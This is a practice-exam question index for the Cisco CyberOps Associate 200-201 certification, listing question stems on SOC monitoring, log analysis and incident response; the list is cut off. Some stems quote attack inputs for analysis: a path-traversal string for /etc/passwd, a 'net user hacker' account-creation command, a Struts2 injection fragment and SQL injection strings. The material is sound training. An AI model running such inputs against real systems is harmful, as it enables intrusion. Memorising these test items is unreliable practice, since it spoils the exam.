Courseiva

200-201 · domain

scenario questions

Practise Cisco CyberOps Associate 200-201 scenario questions practice questions — original exam-style scenarios with answer choices, explanations, and analysis of common mistakes.

968 questions251 easy425 medium292 hard

Focused practice

Practice scenario questions questions

Scored sessions drawing only from this domain — pick a length below.

Start 20-question practice test →

What this domain covers

What to know about scenario questions

scenario questions questions test whether you can apply the concept in context, not just recognise a definition.

How the topic appears in realistic exam-style scenarios.

Which detail in the question changes the correct answer.

How to eliminate plausible but wrong options.

How to connect the question back to the wider exam objective.

Watch out for

Common scenario questions exam traps

  • ▸Answering from memory before reading the full scenario.
  • ▸Missing a constraint such as cost, availability, security, scope or command context.
  • ▸Choosing a broad answer when the question asks for the most specific fix.
  • ▸Ignoring why the wrong options are tempting.

Question index

All scenario questions questions (968)

Click any question to see the full explanation, or start a practice session above.

1

A multinational manufacturer handles personal data of employees in several countries and wants to ensure its security program aligns with recognized international standards for establishing, implementing, maintaining, and continually improving an information security management system. Which framework should the security team adopt as the primary basis for this program?

Hard
2

An organization wants to ensure that a received email genuinely came from the claimed sender and has not been altered. Which cryptographic mechanism provides both authentication and integrity?

Hard
3

A healthcare organization must comply with HIPAA. Which THREE security measures are typically required under HIPAA? (Choose three.)

Medium
4

During a security audit, an analyst finds that a third-party vendor has access to sensitive customer data beyond what is necessary for their services. Which principle of least privilege should the policy enforce?

Hard
5

An analyst detects HTTPS traffic to a domain that was registered only 24 hours ago and has no web content. The traffic occurs at odd hours and with consistent packet sizes. What technique is likely being used for C2?

Easy
6

A SOC analyst is investigating a suspected network intrusion and reviews NetFlow records. The analyst observes a sudden increase in outbound traffic from a single internal host to an external IP address, with large data volumes during off-hours. Which two additional indicators should the analyst examine to confirm data exfiltration? (Choose two.)

Medium
7

An IDS/IPS alert shows a signature named 'ET POLICY Outgoing HTTP Request with Suspicious User-Agent' with severity high. What is the most likely next step for an analyst?

Medium
8

An organization wants to ensure that data sent over the internet cannot be read if intercepted. Which cryptographic method should be used?

Hard
9

A security analyst is monitoring network traffic and notices a large number of TCP SYN packets being sent to a single host on various ports. Which type of attack is most likely occurring?

Easy
10

A security analyst is analyzing a PCAP file in Wireshark and wants to isolate all HTTPS traffic. Which display filter should the analyst use?

Medium
11

A security analyst is reviewing a recent security incident where an attacker gained unauthorized access to a server. The analyst needs to determine which factors contributed to the incident by examining the vulnerability, threat, and risk. Which TWO of the following best describe the relationship between these concepts in this scenario? (Choose two.)

Hard
12

A company's security policy requires that all servers have host-based intrusion detection (HIDS) installed and configured to send alerts to the SIEM. During a routine check, you find that a critical database server has HIDS installed but is not sending alerts because the agent service is stopped. The server administrator says he stopped the service because it was using too much CPU. The policy requires that any deviation from baseline must be approved by the security team. What should you do?

Medium
13

A SOC analyst is tuning a SIEM correlation rule to detect port scanning. The rule should generate an alert when a single source IP connects to many different destination ports on multiple hosts within a short time. Which THREE conditions should be included in the rule?

Hard
14

In Zeek (Bro), which log file would an analyst examine to identify HTTP methods, URIs, and response codes from web traffic?

Hard
15

Which of the following is a common indicator of DNS tunneling used for exfiltration?

Medium
16

A security analyst is examining a Windows 10 host and suspects that an attacker has established persistence using a scheduled task. The analyst runs 'schtasks /query /fo LIST /v' and observes a task named 'WindowsUpdateCheck' with the action 'C:\Users\Public\update.exe' and a trigger set to run every 5 minutes. Which of the following best describes the attacker's technique?

Hard
17

An analyst is investigating a potential data exfiltration via DNS. In Zeek DNS logs, the analyst sees many queries for subdomains like 'a1b2c3.malicious.com', 'd4e5f6.malicious.com' etc. from an internal host. Which technique is likely being used?

Hard
18

Which TWO pieces of information are essential for an analyst to correlate when investigating an intrusion alert from a network-based sensor?

Easy
19

Which TWO of the following are best practices for configuring syslog in a secure monitoring environment? (Choose two.)

Easy
20

A security analyst is analyzing a suspicious PE file. Using a hex editor, the analyst sees the ASCII string 'MZ' at the beginning. What does this indicate?

Medium
21

You are a senior analyst in a SOC that monitors a large financial institution. The SIEM correlates events from firewalls, IDS, endpoints, and database servers. Over the past week, you have noticed multiple low-priority alerts from the IDS indicating 'ET SCAN NMAP -sS' scans from internal IP 10.0.0.50, which is a print server. The alerts occur at random times during business hours. The number of alerts has increased from 5 per day to 20 per day. The print server runs a standard OS and printer management software. No other alerts are triggered from that host. The firewall logs show outbound connections from the print server to IPs on the internet on port 443, which is abnormal for a print server. You check the printer management software and see no recent updates. The user of the print server, the IT administrator, reports no issues. What is your best course of action?

Hard
22

An analyst is examining a syslog message from a Cisco ASA showing: %ASA-4-106023: Deny udp src outside:192.0.2.1/123 dst inside:10.0.0.5/123. Which type of traffic is being denied?

Easy
23

A SOC analyst is reviewing a packet capture from an internal web server and notices that a single external IP sent 4,000 TCP segments with the ACK flag set to a closed port, and each segment received a RST response. No SYN packets preceded these segments. Which type of scan is this host most likely performing?

Medium
24

A SOC Tier 2 analyst is investigating an alert that was escalated by Tier 1. The analyst needs to perform deeper correlation and malware analysis. Which of the following actions is most appropriate for Tier 2?

Hard
25

Which TWO of the following are valid reasons to use a proxy server for security monitoring? (Choose two.)

Hard
26

During an incident, a SOC Tier 1 analyst identifies a series of failed login attempts from an internal IP address. The analyst escalates the alert. What is the primary role of a Tier 2 analyst in this scenario?

Medium
27

Which Windows registry hive contains user-specific configuration settings that can be modified by applications?

Easy
28

A security auditor reviews the SNMP configuration. Which security concern should be reported?

Hard
29

Which TWO network behaviors suggest an ARP spoofing attack is occurring? (Choose two.)

Hard
30

A security analyst observes repeated failed login attempts from a single external IP address, causing the authentication server to become unresponsive. Which type of attack is occurring?

Medium
31

Which SOC tier is responsible for threat hunting and advanced forensic analysis?

Easy
32

Drag and drop the steps to configure a VLAN on a Cisco switch into the correct order.

Medium
33

Based on the exhibit, what does the sequence of events indicate?

Hard
34

Which organization facilitates threat intelligence sharing among members in a specific sector, such as finance or healthcare?

Easy
35

A Cisco Firepower appliance generates an intrusion specific event with the message 'MALWARE-CNC generic command and control traffic detected'. The analyst needs to determine if the alert is a true positive. Which additional data source would provide the most corroborating evidence?

Hard
36

An attacker uses a tool to capture keystrokes on a compromised system. What type of malware is most likely in use?

Medium
37

A security analyst is reviewing logs and notices that an attacker has intercepted and modified communications between two devices on the same network. Which attack technique is being used?

Medium
38

An analyst is examining a Linux system for signs of an attacker establishing persistence. Which TWO of the following locations should the analyst check? (Choose two.)

Medium
39

A security manager is developing a business continuity plan (BCP) for a critical e-commerce application. The application has a recovery time objective (RTO) of 4 hours and a recovery point objective (RPO) of 15 minutes. The manager must choose a backup strategy that meets these objectives. Which strategy is most appropriate?

Medium
40

An analyst is configuring a Snort rule to detect a known exploit targeting Apache web servers. The exploit sends a malicious HTTP POST request with a long User-Agent string. Which Snort rule header and options are most appropriate?

Hard
41

An analyst is triaging a suspected FTP brute-force campaign against an internal server. The IDS reports many failed authentication attempts from a single external address. Which TWO data points, gathered from the FTP server and network logs, most directly support confirming and characterizing the attack? (Choose two.)

Hard
42

An analyst is examining a Windows 10 host and discovers that a service named 'WinDefendSvc' is registered with a binary path of C:\ProgramData\svchost.exe and a display name of 'Windows Defender Service'. The legitimate Windows Defender service uses a different name and binary path. Which conclusion is most accurate?

Hard
43

A security analyst is examining a PCAP and observes a TCP stream where the client sends a single packet with the PSH, ACK flags set, and the server responds with a single packet with the RST, ACK flags set. The client then sends no further packets. What is the most likely explanation for this behavior?

Hard
44

Refer to the exhibit. What does this syslog message indicate?

Easy
45

Refer to the exhibit. What type of activity does this log represent?

Easy
46

A security analyst is investigating an alert that indicates a potential SQL injection attack. Which of the following HTTP request patterns is most indicative of a SQL injection attempt?

Easy
47

A security analyst observes a sudden spike in outbound traffic from a critical server to an external IP address on TCP port 443. The server is a web application server that normally only receives inbound connections. Which type of intrusion is most likely occurring?

Hard
48

Which protocol and port pair is commonly used for secure web traffic?

Easy
49

When analyzing a suspicious PE file, the analyst calculates the file's entropy and finds it to be 7.8. What does a high entropy value typically indicate, and why is it relevant to malware analysis?

Hard
50

A security analyst is investigating a Windows host for signs of fileless malware. The analyst runs a memory analysis tool and observes a process named 'powershell.exe' with a parent process of 'winword.exe'. The command line includes '-enc' followed by a long base64 string. Which technique is most likely being used by the attacker?

Hard
51

You are a security analyst for a financial institution. Over the past hour, the intrusion detection system has generated multiple alerts for outbound traffic from a single internal host (10.0.0.50) to various external IP addresses on port 443. The alerts indicate that the host is making HTTPS connections to IPs that are associated with known command and control servers. Additionally, the host has been observed making DNS queries for domains that are algorithmically generated (e.g., rgj3k2.example.com, fh7d8s.example.net). The host is a Windows 10 workstation used by an employee in the accounting department. The employee reports that they have not noticed any unusual behavior, but they did click on a link in a phishing email yesterday. The network administrator confirms that the host's firewall rules allow outbound HTTPS traffic. You have access to endpoint logs, network flow data, and packet captures. Which course of action should you take FIRST?

Hard
52

A security analyst is selecting a symmetric encryption algorithm for encrypting data at rest. Which of the following is a suitable symmetric algorithm?

Hard
53

An investigator seizes a laptop as evidence from a crime scene. At the scene, the laptop is turned on and a log file is open. What should the investigator do to preserve evidence according to chain of custody procedures?

Hard
54

A security team wants to adopt a framework that provides a common language for describing cyberthreats, including tactics, techniques, and procedures observed in real intrusions. Which framework should the team use to map adversary behavior?

Hard
55

A security analyst is tasked with developing a data loss prevention (DLP) strategy for the organization. The strategy must align with the CyberOps Associate curriculum and address both endpoint and network-based data exfiltration. Which two actions should the analyst include in the strategy? (Choose two.)

Hard
56

A security analyst is investigating an alert that indicates a host is sending a large number of DNS queries to an external domain. The analyst wants to determine if the traffic is malicious and if it is using a DNS tunnel. Which type of analysis should the analyst perform to confirm the presence of a DNS tunnel?

Medium
57

What is the primary difference between symmetric and asymmetric encryption?

Medium
58

An analyst identifies a series of SMB authentication attempts from a compromised host to multiple internal servers. The authentication uses NTLM hashes. Which TWO techniques are most likely being used for lateral movement? (Select 2)

Medium
59

A network administrator has configured a SPAN port to send traffic to an intrusion detection system (IDS). However, the IDS is not seeing traffic from a specific VLAN. What is the most likely cause?

Easy
60

What is the primary goal of the 'integrity' pillar of the CIA triad?

Easy
61

An IDS alert indicates that a server received HTTP requests containing long strings of the form ../../../../etc/passwd in a URL parameter. The web server returned HTTP 200 responses to these requests. Which conclusion should the analyst draw while continuing the investigation?

Medium
62

You are analyzing network traffic from a compromised host. The host is running Windows and is connected to a corporate network. The IDS generated an alert for a known malware signature matching traffic from the host to an external IP on port 443. However, you see that the traffic is encrypted and the destination IP is a cloud storage provider. The host also shows periodic DNS queries to a domain that closely resembles the cloud provider's domain but with a single character difference (typosquatting). The employee on that host reports no unusual activity. Which step should you take first to confirm the compromise?

Medium
63

A security analyst is reviewing a suspicious email reported by a user. The email appears to come from the CEO and requests an urgent wire transfer. The analyst examines the email headers and notices that the 'From' address is spoofed and the 'Reply-To' address is different from the 'From' address. The email also contains a link to a credential-harvesting page. Which type of attack is this?

Hard
64

A company's security policy states that all network traffic must be inspected by an IPS. However, encrypted traffic (SSL/TLS) is bypassing inspection. The network team wants to implement SSL decryption. What is the primary policy consideration before implementing?

Hard
65

A security analyst is examining a suspicious executable found on a compromised host. The analyst runs the command 'strings malware.exe' and sees the string 'cmd.exe /c net user hacker P@ssw0rd /add'. What is the most likely intent of this command?

Easy
66

Which Windows artifact stores evidence of file execution, including the path and run count, and is located in C:\Windows\Prefetch?

Easy
67

A Linux administrator checks authentication logs to investigate a possible brute-force attack. Which log file typically contains records of successful and failed SSH login attempts?

Easy
68

A network administrator is using Cisco ISE to monitor endpoint authentication. Which report provides details on failed authentication attempts and the reasons?

Easy
69

During a risk assessment, a company identifies that the annualized loss expectancy (ALE) for a specific threat is $50,000. The cost to implement a mitigation control is $30,000 with an annual maintenance cost of $5,000. According to risk management principles, what is the most appropriate risk treatment option?

Hard
70

Which Wireshark filter can be used to extract the full TCP data of a specific conversation from a PCAP?

Medium
71

A network analyst is examining a packet capture and notices a series of TCP packets where the client sends a SYN, the server responds with SYN-ACK, and the client never sends an ACK. The client repeats this for many destination ports on the same server. Which conclusion is most accurate?

Medium
72

An organization wants to ensure that security logs are tamper-proof and available for forensic analysis. Which logging best practice should be implemented?

Easy
73

An analyst is tuning Snort IDS rules and wants to reduce false positives. Which TWO rule options can be adjusted to decrease sensitivity?

Hard
74

An organization is implementing a security policy that requires all remote access to the corporate network to be authenticated using multi-factor authentication (MFA). Which TWO of the following are valid MFA factors?

Medium
75

During a security monitoring review, an analyst notices an unusual amount of traffic on port 445. Which protocol is most likely associated with this port?

Easy
76

An organization is implementing an AUP that prohibits personal use of corporate resources. However, an employee uses a company laptop to access personal email, which leads to a malware infection. Which policy violation is most directly implicated?

Hard
77

A security policy requires that all mobile devices connecting to corporate email must have a screen lock and be able to be remotely wiped. An employee's personal phone is lost. The employee reports the loss immediately. The phone is enrolled in MDM with remote wipe capability. However, the employee has not set a screen lock, violating policy. The phone contains synced email and contacts. What should the security team do?

Medium
78

A SOC Tier 3 analyst is performing threat hunting. Which activity best describes the primary focus of a Tier 3 analyst?

Hard
79

A security analyst is examining a suspicious executable found on a user's workstation. The file appears to be a legitimate PDF document but when opened, it executes code that encrypts the user's files and demands payment. The analyst determines that the file is actually a malicious program disguised as a benign file. Which type of malware is this?

Easy
80

An analyst is examining a PCAP file for signs of lateral movement. Which TWO of the following are typical indicators of lateral movement using pass-the-hash?

Medium
81

An analyst is reviewing Sysmon logs on a Windows host and sees Event ID 1 (process creation) with a signed parent process but an unsigned child. The child has a CommandLine that includes 'powershell -EncodedCommand'. What is the most likely threat?

Hard
82

During network intrusion analysis, an analyst reviews logs and observes an alert for a TCP SYN scan. Which characteristic of a SYN scan would the analyst look for in packet captures?

Easy
83

An analyst uses Volatility on a memory dump and runs the 'pstree' command. What specific information does this provide compared to 'pslist'?

Medium
84

A security analyst is investigating a potential data exfiltration incident. The analyst observes that a large amount of data is being transferred from an internal database server to an external IP address during non-business hours. The transfer is using an encrypted channel that is not typical for the server's normal operations. Which type of threat is this activity most likely associated with?

Medium
85

Which security principle ensures that a user cannot deny having performed an action?

Medium
86

During incident response, a security analyst reviews a PCAP file and sees TCP packets with only the SYN flag set, followed by RST packets upon receiving a SYN-ACK. No connection is established. Which scanning technique is being used?

Hard
87

Which cryptographic method uses the same key for both encryption and decryption, and is typically faster than asymmetric encryption?

Medium
88

Which TWO of the following are examples of malware that rely on user interaction to spread? (Select two.)

Easy
89

A security team implements an IPS that uses behavioral profiling. Which type of detection method is being used?

Hard
90

An organization's security policy defines acceptable use of corporate email. Which THREE of the following actions are typically prohibited?

Easy
91

A Cisco Stealthwatch analyst notices a host on the internal network is sending periodic DNS queries to a single external domain with subdomains that are long, random-looking strings (e.g., a8f3k2j9d0x1.example.com). The queries occur every 60 seconds, and the responses are consistently NXDOMAIN. Which type of malicious activity does this pattern most strongly indicate?

Medium
92

An analyst is examining a suspicious executable recovered from a compromised host. Static analysis shows it is packed, and dynamic analysis in a sandbox reveals it creates a mutex, modifies registry Run keys, and attempts to connect to a hardcoded IP address on port 443. The file also contains a section with high entropy. Which characteristic most strongly suggests the file is packed or encrypted?

Medium
93

During a security incident, a security analyst isolates an affected host and collects a memory dump. According to incident response procedures, what is the next step the analyst should take?

Medium
94

A security analyst is notified that an employee's laptop was stolen. The laptop contains sensitive customer data. Which type of threat does this incident represent?

Easy
95

An analyst reviews the Cisco ASA syslog message shown in the exhibit. What does this entry indicate?

Medium
96

When performing file analysis, which method is most reliable for determining the actual file type regardless of its extension?

Easy
97

A SOC analyst is reviewing firewall logs and sees repeated outbound connections from an internal server to an external IP on TCP port 443, but the traffic is not TLS. Packet capture shows a custom binary protocol with periodic small keepalives. Which type of malicious activity is most consistent with these findings?

Hard
98

A SOC analyst is investigating a potential security incident involving a Windows workstation. The analyst has collected network traffic and host logs. Which two artifacts would provide the most direct evidence of a Pass-the-Hash attack? (Choose two.)

Hard
99

A security analyst is investigating a Linux server that was compromised. The attacker used a rootkit to hide processes and files. The analyst runs 'lsmod' and notices a kernel module named 'hideproc' that is not recognized. Which command should the analyst use to determine the module's file path and potentially identify the rootkit?

Hard
100

A new security analyst is reviewing the organization's data classification policy and notices that data labeled 'Restricted' must be encrypted at rest and in transit, while data labeled 'Internal' has no encryption requirement. The analyst asks why the policy distinguishes between these levels. What is the primary purpose of a data classification policy?

Easy
101

In network forensics, which Wireshark filter would be used to reconstruct a TCP conversation between two hosts?

Easy
102

A Cisco Firepower analyst inspects an inline intrusion policy event where the packet was dropped but only a partial payload was captured. The analyst wants to confirm whether the attack was successful on the target host. Which data source should be correlated with the Firepower event?

Medium
103

A SOC analyst is reviewing Cisco Firepower and NetFlow records for a suspected lateral movement campaign inside the corporate network. Which TWO monitoring observations most strongly support the hypothesis that an attacker is moving laterally using SMB? (Choose two.)

Hard
104

An organization is reviewing its exposure to attack surface. A security architect notes that employees routinely install browser extensions from unapproved sources, and several internal web applications accept unsanitized input. Which concept do these findings primarily describe?

Medium
105

A SOC analyst is triaging a Cisco Stealthwatch alarm that shows a workstation uploading 4 GB to an external IP address at 02:00, outside normal business hours. The destination has no prior reputation data. Which action should the analyst take first according to the incident response process?

Easy
106

Refer to the exhibit. A security analyst is reviewing the ASA configuration. Which traffic will be permitted from the outside interface?

Hard
107

An analyst is reviewing PCAP and sees a TCP stream with a Wireshark filter 'tcp.stream eq 0'. The conversation shows an interactive shell session with commands like 'whoami' and 'ls'. This is most likely evidence of what?

Medium
108

An incident response plan specifies that containment must be completed before eradication. A security analyst identifies a malware infection on a critical server. What should be done first?

Medium
109

An analyst is investigating a potential DNS tunneling attack. Which characteristic in DNS traffic would most likely indicate DNS tunneling?

Easy
110

A security analyst is evaluating the risk of a new vulnerability in a web application. The vulnerability has a CVSS base score of 9.8 and is remotely exploitable without authentication. The application is internet-facing and processes sensitive customer data. Which risk response strategy is MOST appropriate according to risk management principles?

Hard
111

In a PCAP analysis, an analyst uses the filter 'http.request.uri contains "UNION"' and finds multiple HTTP requests with 'SELECT' and 'UNION SELECT' in the URI parameter. Which type of attack is likely occurring?

Easy
112

Which THREE indicators are commonly found in network traffic that suggest a host is part of a botnet? (Choose three.)

Medium
113

Which TWO are examples of technical security controls? (Select two.)

Easy
114

A SOC analyst is tuning IDS signatures and notices that a particular signature triggers frequently on legitimate traffic from a specific internal application. The signature has a high false positive rate. What is the best action to take?

Medium
115

During packet analysis in Wireshark, which THREE findings are indicators of potential malicious activity? (Choose THREE.)

Hard
116

A firewall log shows repeated denied packets from IP 10.0.0.5 to destination 192.168.1.10 on port 22. What is the most likely attack?

Medium
117

Which log source would provide the most detailed information about HTTP requests, including URLs and user agents?

Medium
118

An organization is implementing a threat intelligence sharing program. Which THREE elements are commonly used standards or platforms for sharing threat intelligence?

Hard
119

During a security audit, it is discovered that an organization’s network is vulnerable to ARP spoofing attacks. Which type of attack could result from exploiting this vulnerability?

Hard
120

A host is infected with malware that uses DNS tunneling to exfiltrate data. Which type of analysis would best detect this activity?

Medium
121

Refer to the exhibit. A network administrator notices that remote SSH logins to the router succeed, but the router is not sending accounting records. Based on the configuration, what is the most likely cause?

Hard
122

A network baseline shows that a server typically sends 1-2 MB of data per hour to external IPs. Suddenly, the server sends 50 MB of data to an IP in a foreign country within 10 minutes. The traffic is encrypted. Which monitoring tool would best confirm data exfiltration?

Hard
123

A security analyst is examining system logs for signs of privilege escalation. Which THREE events are most relevant to detect such activity?

Medium
124

During memory analysis using Volatility, an analyst wants to identify processes with suspicious network connections and potentially injected code. Which THREE plugins should the analyst use? (Select THREE)

Medium
125

An analyst is reviewing a PCAP and observes a TCP stream where the client sends a packet with the PSH and ACK flags set, containing an HTTP GET request. The server responds with a packet with the FIN and ACK flags set, but the client continues to send data. Later, the client sends a packet with the RST flag set. Which statement best describes what is happening?

Hard
126

A security analyst is classifying security controls for a new data center. Which TWO of the following are examples of physical controls? (Choose two.)

Medium
127

A security engineer is designing a network to prevent an attacker who gains access to a web server from easily pivoting to the internal database server. Which architecture best achieves this goal?

Hard
128

A security analyst is reviewing firewall logs and notices a high number of denied outbound connections from an internal workstation to various external IP addresses on port 445 (SMB). What is the most likely explanation for this activity?

Medium
129

Which two are best practices for deploying network-based intrusion detection systems? (Choose two.)

Easy
130

You are a cybersecurity analyst in a SOC. The company uses a combination of Snort NIDS and Windows Event Log monitoring. At 3:00 PM, you receive a critical alert: 'ET TROJAN Observed Malicious SSL Certificate (Fake Google)'. The alert shows that a workstation (IP 10.0.1.45) initiated an SSL connection to IP 192.0.2.10 on port 443. The certificate presented by the server is self-signed and claims to be 'google.com'. The destination IP is not in any known Google IP range. You check the firewall logs and see that the outbound connection was allowed. The workstation's host logs show that the user is a marketing employee who frequently accesses webmail. The user reports no unusual behavior. You also check the company's web proxy logs and see that the user accessed 'http://www.google.com' earlier today, but the SSL connection is to a different IP. What should be your next step?

Medium
131

An analyst is examining a suspicious file that appears to be a PDF but when checking the magic bytes at offset 0, sees '50 4B 03 04'. What does this indicate?

Medium
132

A security analyst is examining a Cisco Umbrella Investigate report for a domain that has been flagged as malicious. The report shows a high 'security score' and lists multiple categories including 'Malware' and 'Command and Control'. Which action should the analyst take first?

Easy
133

A junior SOC analyst receives an alert indicating that a workstation attempted to resolve a domain associated with a known malware family. The analyst wants to determine whether the workstation actually connected to the malicious domain or if the resolution attempt was blocked. Which data source would most directly answer this question?

Easy
134

A security analyst reviews the firewall log. What is the most likely reason for the denied connection?

Easy
135

Which TWO of the following are best practices when configuring a SIEM for security monitoring?

Medium
136

You are a security analyst for a medium-sized enterprise. The network includes a DMZ with a web server (10.0.1.10) and a database server (10.0.2.10) in the internal network. Users access the web server via HTTPS from the internet. The web server queries the database server on TCP 3306. Recently, users reported that the web application sometimes returns database errors. You review firewall logs and see the following: - Allowed inbound HTTPS to 10.0.1.10 from various external IPs. - Denied outbound from 10.0.1.10 to 10.0.2.10 on port 3306. - Allowed outbound from 10.0.1.10 to external IPs on port 443. You also notice that the web server's outbound traffic to the database server is being blocked. The firewall has a default deny rule. Which action should you take to restore normal operation while maintaining security?

Hard
137

An analyst is examining a PCAP and sees a series of TCP packets where the client sends a SYN, receives a SYN-ACK, and then sends an ACK. Immediately after, the client sends a packet with the RST flag set, terminating the connection before any application data is exchanged. This pattern repeats across many destination ports on the same server. Which activity does this most likely represent?

Hard
138

A security engineer is implementing controls to meet compliance requirements. Which TWO of the following frameworks are specifically designed for protecting personal data?

Medium
139

A SOC team is implementing a security monitoring solution for a cloud-based infrastructure. Which of the following is the most important consideration for effective monitoring?

Hard
140

An analyst is reviewing Cisco Firepower intrusion events and sees an alert for a TCP connection to an internal web server on port 80 with the rule message 'SERVER-WEBAPP Apache Struts2 remote code execution attempt'. The packet payload contains the string 'Content-Type: %{(#_='multipart/form-data')'. The server is running Apache Struts2 version 2.3.15. What should the analyst do next?

Hard
141

An organization uses both network-based intrusion detection (NIDS) and host-based intrusion detection (HIDS). A HIDS alert reports that a critical server's registry key was modified. The NIDS shows no corresponding network activity. The change occurred during a scheduled maintenance window. What is the best course of action for the analyst?

Medium
142

A security analyst is examining a Linux server that is suspected of being compromised. The analyst runs `ls -l /proc/<PID>/exe` for a suspicious process and sees that the symbolic link points to `/tmp/.hidden/update` but the file no longer exists on disk. Which conclusion is most accurate?

Hard
143

Which OSI layer is responsible for logical addressing and routing, and is commonly targeted by IP spoofing attacks?

Easy
144

An analyst sees an alert: 'ET POLICY Outgoing HTTP Request with Suspicious User-Agent (Mozilla/5.0 compatible; MSIE 6.0; Windows NT 5.1)'. The source is an internal host that typically uses Windows 10. What should the analyst suspect?

Medium
145

During an intrusion investigation, an analyst needs to determine whether a specific internal host communicated with a known malicious IP address. The analyst has full packet capture for the relevant window but only wants to see the TCP stream from that host to the suspect address. Which Wireshark display filter isolates that conversation?

Easy
146

A security analyst at a mid-sized company is reviewing a packet capture from the DMZ and notices a series of TCP SYN packets sent to multiple ports on a single internal web server, all originating from the same external IP address within a 3-second window. None of the SYN packets are followed by a completed three-way handshake. The analyst must classify this activity to determine the appropriate response. Which type of attack is most consistent with this traffic pattern?

Medium
147

An organization is reviewing its risk management process and identifies a risk with a high probability and high impact. Management decides to stop the activity causing the risk. Which risk treatment option is being applied?

Medium
148

Refer to the exhibit. A security analyst reviews the ACL configuration applied outbound on the external interface. Which statement is true about traffic from the 192.168.1.0/24 network to the internet?

Medium
149

Which risk treatment option involves implementing security controls to reduce the likelihood or impact of a risk?

Easy
150

Which TWO of the following are common network security protocols? (Choose two.)

Medium
151

A security team is implementing a defense-in-depth strategy and wants to ensure that even if an attacker compromises a web server, the attacker cannot easily move laterally to the internal database server. Which security principle is being applied when the team segments the network and restricts traffic between the web tier and the database tier?

Easy
152

Which THREE of the following are key principles of zero trust security? (Choose three.)

Hard
153

Which TWO locations in a Linux filesystem should be checked for evidence of malware persistence?

Hard
154

A network engineer is designing a segmented network to protect a sensitive database. The database must be accessible only from a specific application server. Which security concept best describes this design?

Hard
155

A company's legal counsel is involved in an incident response due to a data breach. What is the primary role of legal counsel during the incident?

Medium
156

A security analyst is reviewing firewall logs and notices a rule that denies traffic from source IP 10.0.0.5 to destination port 3389. What service is being blocked?

Medium
157

A security analyst is investigating a Windows host suspected of malware infection. Which tool would allow the analyst to view parent-child relationships of running processes and inspect command line arguments?

Easy
158

Which risk treatment option involves taking actions to reduce the likelihood or impact of a risk?

Easy
159

A company's remote access policy requires VPN connections to use two-factor authentication (2FA). An employee reports they cannot connect because their token is not syncing. What is the best course of action?

Medium
160

An organization's incident response team has identified a malware infection on a critical server. They need to collect evidence for potential legal action. Which of the following is the most important step to ensure the admissibility of the evidence?

Hard
161

Which type of traffic is most prominent in this NetFlow data?

Hard
162

A multinational retailer is aligning its security program with the NIST Cybersecurity Framework. The CISO wants to prioritize activities that improve the ability to detect and respond to cybersecurity events. Which Function in the NIST CSF Core is specifically described as encompassing activities to identify the occurrence of a cybersecurity event?

Medium
163

You are a security analyst at a mid-sized company. The company uses a SIEM to collect logs from firewalls, IDS, and servers. Recently, the SIEM generated an alert for a potential brute-force attack against the company's VPN server. The alert is based on a correlation rule that triggers when more than 30 failed authentication attempts from a single source IP occur within 10 minutes. You investigate and see that the source IP is 203.0.113.50, which is a known IP address of a partner company that uses the VPN for remote access. The failed attempts are all from the same username 'john.doe'. You also notice that the attempts are happening every 5 seconds, exactly 6 attempts per minute. The partner company has a policy that locks accounts after 3 failed attempts. Based on this scenario, what is the most likely cause of the alert?

Easy
164

Which Cisco tool provides network-wide visibility and can detect anomalies using NetFlow and behavioral analysis?

Easy
165

An analyst is examining a Linux server and notices an unusual systemd service that starts automatically. Which command would be used to disable this service?

Medium
166

An analyst reviews network logs and sees a large outbound FTP transfer of 500 MB from a workstation to an external IP at 2:00 AM. The workstation regularly sends 10 MB daily. What should the analyst suspect?

Medium
167

A security analyst is reviewing the organization's data classification policy. The policy defines four levels: Public, Internal, Confidential, and Restricted. Which TWO handling requirements are typically associated with data classified as 'Restricted'? (Choose two.)

Hard
168

An analyst notices that an internal host is sending periodic ICMP echo requests to an external IP, and the echo replies contain payloads that are longer than the default Windows ping payload. The payload bytes appear to be encoded and change with each reply. Which activity is most likely occurring?

Medium
169

During alert triage, an analyst determines that an alert fired but no actual attack or malicious activity occurred on the network. How should this alert be classified?

Easy
170

A SOC analyst receives an alert that a user account successfully authenticated to the VPN from two geographically distant locations within four minutes. Both sessions remain active. The identity team confirms the user is traveling and has only one device. Which monitoring conclusion is most appropriate?

Easy
171

Which of the following best describes a vulnerability?

Easy
172

Which TWO actions are recommended when tuning IDS signatures to reduce false positives?

Medium
173

A security analyst is reviewing a Windows system for signs of malware persistence. The analyst notices a suspicious executable named 'updater.exe' in the Startup folder. Which Windows feature is being abused by the malware in this scenario?

Easy
174

Match each network protocol to its well-known port number.

Medium
175

Which component of a SIEM is responsible for converting log data from various sources into a standard format?

Medium
176

During a security incident, an analyst captures network traffic and observes multiple connections from an internal host to a remote IP on port 4444, with irregular packet timing and small payloads. Which type of activity is most likely indicated?

Medium
177

An organization experiences a ransomware attack where files are encrypted and a ransom is demanded. Which element of the CIA triad is most directly impacted?

Medium
178

An organization's security policy requires data classification labels to be applied to all documents. A manager sends a spreadsheet containing employee PII (personally identifiable information) to the entire company without labeling. Which policy has been violated?

Hard
179

Which two are common techniques used in network intrusion analysis? (Choose two.)

Easy
180

An alert shows a high volume of outbound traffic from an internal host to an external IP using FTP. The data includes files with names matching internal document names. This activity is most likely:

Hard
181

A security analyst is examining a suspicious file and calculates its SHA-256 hash. The analyst then queries Cisco Talos Intelligence for the hash. The result shows that the file is known malware with a detection name of 'Trojan.GenericKD.123456'. Which of the following does this result indicate?

Easy
182

An organization is required to preserve data that may be relevant to a lawsuit. Which legal process is invoked to prevent destruction of this data?

Hard
183

Which THREE of the following are common indicators of compromise (IOCs) that a security monitoring system might trigger on?

Easy
184

Which TWO of the following are valid reasons to create an exception to a security policy? (Choose two.)

Hard
185

An organization wants to implement a security framework that includes functions such as Identify, Protect, Detect, Respond, and Recover. Which framework aligns with this structure?

Hard
186

Which TWO of the following are common sources of security events used in security monitoring?

Easy
187

During a penetration test, a security engineer uses publicly available information from LinkedIn and Google to gather details about employees and organizational structure. Which type of reconnaissance is being performed?

Hard
188

A healthcare organization is developing an incident response plan. The security manager wants to ensure that the plan includes a phase where the team practices and tests their response capabilities before an actual incident occurs. According to the NIST incident response lifecycle, which phase involves preparing and preventing incidents through activities like training and exercises?

Easy
189

An analyst examining a PCAP sees a host send an HTTP GET request where the User-Agent string contains a long, random-looking hexadecimal value, the request path includes a similarly random string, and the server responds with a 404 status code but a response body of several kilobytes. This pattern repeats every 60 seconds. Which activity is most likely occurring?

Hard
190

